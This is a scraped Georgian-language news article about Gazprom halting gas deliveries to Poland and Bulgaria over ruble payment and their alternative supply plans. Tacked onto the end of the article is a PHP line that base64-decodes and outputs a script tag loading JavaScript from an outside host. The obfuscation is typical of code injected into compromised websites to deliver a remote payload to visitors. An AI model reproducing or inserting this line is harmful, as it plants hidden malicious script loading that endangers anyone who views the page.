celsiusi
ავერსი საქკაბელი
რუსულმა კომპანია „გაზპრომ“-მა ბუნებრივი გაზის მიწოდება შეუწყვიტა ბულგარეთს და პოლონეთს მას შემდეგ, რაც მათ უარი თქვეს გაზის საფასური რუბლით გადაეხადათ.
 
„გაზპრომ“-მა პოლონეთს და ბულგარეთს ვადა 26 აპრილის ჩათვლით მისცა, დღეიდან, 27 აპრილიდან კი, ორივე ქვეყანას გაზის მიწოდება შეუწყვიტა. პოლონეთმა და ბულგარეთმა რუსეთის ეს გადაწყვეტილება წლევანდელი კონტრაქტის დარღვევად შეაფასეს.
 
ამასთან, პოლონეთის მთავრობაში განაცხადეს, რომ ამჟამად ქვეყნის მარაგი დაახლოებით 80%-ითაა შევსებული და მზად არიან იმისთვისაც, რომ გაზი სხვა წყაროებიდან შეიძინონ. ამას აპირებს ბულგარეთის მთავრობაც. ენერგეტიკის სამინისტროს ინფორმაციით, გაზის მოხმარების შეზღუდვა საჭირო არ გახდება, რადგან ენერგოკომპანიებთან ერთად შეიმუშავეს მიწოდების ალტერნატიული მექანიზმები. მათ შორის, ბულგარეთი აპირებს აზერბაიჯანიდან გაზის იმპორტის გაზრდას.
 
უკრაინაზე თავდასხმის შემდეგ, რუსეთის პრეზიდენტმა პუტინმა მოითხოვა, რომ „არამეგობრულმა ქვეყნებმა“, ანუ მათ, ვინც მხარს უკრაინას უჭერს, რუსული გაზის საფასური არა დოლარით, ან ევროთი, არამედ რუბლით გადაიხადონ. ამაზე უარი განაცხადა ევროკავშირმა, რომელსაც რუსეთისთვის ფინანსური და ეკონომიკური სანქციები აქვს დაწესებული.
 
ამჟამად ევროკავშირში განიხილება რუსული გაზისა და ნავთობისთვის ემბარგოს დაწესების საკითხიც, რასაც გაერთიანების წევრი არაერთი სახელმწიფო ეწინააღმდეგება.
716
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");